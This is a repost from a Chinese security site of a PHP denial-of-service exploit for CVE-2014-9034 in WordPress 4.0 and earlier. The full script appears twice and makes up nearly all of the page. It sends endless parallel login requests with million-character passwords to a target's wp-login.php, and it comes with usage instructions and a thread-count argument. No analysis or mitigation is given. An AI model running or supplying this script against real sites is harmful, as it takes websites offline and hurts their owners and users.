WordPress <= v4.0 Denial of Service Exploit

没穿底裤 2020年1月1日06:13:10评论408 views字数 11阅读0分2秒阅读模式
摘要

[php]

echo "/nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability/n";
echo "Proof-of-Concept developed by [email protected] (http://secureli.com)/n/n";
echo "usage: php wordpressed.php domain.com username numberOfThreads/n";
echo " e.g.: php wordpressed.php wordpress.org admin 50/n/n";

echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " .
$argv[1];

do {

$multi = curl_multi_init();
$channels = array();

for ($x = 0; $x < $argv[3]; $x++) {
$ch = curl_init();

$postData = array(
'log' => $argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");

$cookieFiles = "cookie.txt";

curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725
Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));

curl_multi_add_handle($multi, $ch);

$channels[$x] = $ch;
}

$active = null;

do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);

while ($active && $mrc == CURLM_OK) {
do {

$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}

foreach ($channels as $channel) {
curl_multi_remove_handle($multi, $channel);
}

curl_multi_close($multi);
echo ".";
} while (1==1);

?>
[/php]

[php]
php

echo "/nCVE-2014-9034 | WordPress <= v4.0 Denial of Service Vulnerability/n";
echo "Proof-of-Concept developed by [email protected] (http://secureli.com)/n/n";
echo "usage: php wordpressed.php domain.com username numberOfThreads/n";
echo " e.g.: php wordpressed.php wordpress.org admin 50/n/n";

echo "Sending POST data (username: " . $argv[2] . "; threads: " . $argv[3] . ") to " .
$argv[1];

do {

$multi = curl_multi_init();
$channels = array();

for ($x = 0; $x < $argv[3]; $x++) {
$ch = curl_init();

$postData = array(
'log' => $argv[2],
'pwd' => str_repeat("A",1000000),
'redirect_to' => $argv[1] . "/wp-admin/",
'reauth' => 1,
'testcookie' => '1',
'wp-submit' => "Log%20In");

$cookieFiles = "cookie.txt";

curl_setopt_array($ch, array(
CURLOPT_HEADER => 1,
CURLOPT_USERAGENT => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725
Firefox/2.0.0.6",
CURLOPT_REFERER => $argv[1] . "/wp-admin/",
CURLOPT_COOKIEJAR => $cookieFiles,
CURLOPT_COOKIESESSION => true,
CURLOPT_URL => $argv[1] . '/wp-login.php',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => $postData,
CURLOPT_FOLLOWLOCATION => true));

curl_multi_add_handle($multi, $ch);

$channels[$x] = $ch;
}

$active = null;

do {
$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);

while ($active && $mrc == CURLM_OK) {
do {

$mrc = curl_multi_exec($multi, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
}

foreach ($channels as $channel) {
curl_multi_remove_handle($multi, $channel);
}

curl_multi_close($multi);
echo ".";
} while (1==1);

?>
[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日06:13:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WordPress <= v4.0 Denial of Service Exploithttp://cn-sec.com/archives/76041.html

发表评论

匿名网友 填写信息